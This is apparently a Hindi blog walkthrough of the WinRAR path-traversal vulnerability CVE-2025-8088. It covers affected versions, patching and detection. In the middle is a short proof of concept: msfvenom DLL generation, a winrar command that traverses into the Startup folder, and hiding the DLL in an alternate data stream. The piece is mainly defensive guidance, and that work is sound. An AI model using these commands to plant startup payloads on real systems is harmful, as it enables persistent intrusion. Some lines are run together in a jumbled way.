
CVE-2025-8088 को उजागर करने, पैच करने और सुरक्षित करने पर एक आकर्षक वॉकथ्रू, हैकर के व्यावहारिक ट्विस्ट के साथ।
WinRAR — वह धूल-पुस्त क्लासिक जो सबने इंस्टॉल किया है लेकिन कोई अपडेट नहीं करता — अभी एक उच्च-गंभीरता का जीरो-डे झेल गया: CVE-2025-8088।
CISA ने इसे अपनी ज्ञात शोषित कमजोरियों की सूची में डाल दिया है, जिसमें 2 सितंबर 2025 तक सुधार की समय-सीमा है। यह सिर्फ थ्योरी नहीं है — यह जीती-जागती आग है।
..\Startup\evil.dllप्रभावित: विंडोज के लिए WinRAR (≤7.12), UnRAR.dll, पोर्टेबल UnRAR सुरक्षित: लिनक्स, यूनिक्स, एंड्रॉइड बिल्ड।
घबराने या हैकर बनने से पहले, अपना वर्जन जांचें।
Help → About WinRARwinget list WinRAR
(या अपने इंस्टॉल डायरेक्टरी से winrar.exe चलाएँ)
UnRAR.dll पर राइट-क्लिक करें → Properties → Details।जब मैंने यह लिखना शुरू किया, मैं 7.10 पर था — हाँ, पकने के लिए तैयार 🗿🐔🍗।
Help → About WinRAR → 7.13 या उससे ऊपर होना चाहिए।UnRAR.dll बदलें।WinRAR ऑटो-अपडेट नहीं करता — एक कैलेंडर रिमाइंडर सेट करें, स्थिर निशाना न बनें।
PS: यहाँ मेरे वॉलपेपर फ्लेक्स को अनदेखा करें — थोड़ा दिखावा करना था! 😏
%TEMP% और स्टार्टअप फोल्डर में दुर्भावनापूर्ण DLLs/LNKs गिराए।⚠ अस्वीकरण: यह केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। पूरी तरह ग्रेमलिन न बनें 🗿।
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
बूम — evil.dll स्टार्टअप में पहुँच जाता है। अगला रीबूट? हैलो calc.exe।
पैच → WinRAR 7.13+
संदिग्ध .dll या .lnk खोजें:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%ADS पर नजर रखें:
streams.exe -s C:\
IDS/IPS नियम: ..\ अनुक्रम वाले RAR को फ्लैग करें।
Nessus/Qualys प्लगइन्स पहले से सक्रिय हैं।
यह कोई "शायद-एक-दिन" कमजोरी नहीं थी — यह खुलासे से पहले हथियारबंद किया गया था। यदि आप अभी भी 7.10 पर बैठे हैं (जैसा कि मैं यह लिखते समय था), तो अभी पैच करें। यदि आप रेड टीम की तरफ हैं, तो इसे एक केस स्टडी के रूप में देखें कि कैसे पुराने उपकरण नए हमले के वेक्टर बन जाते हैं।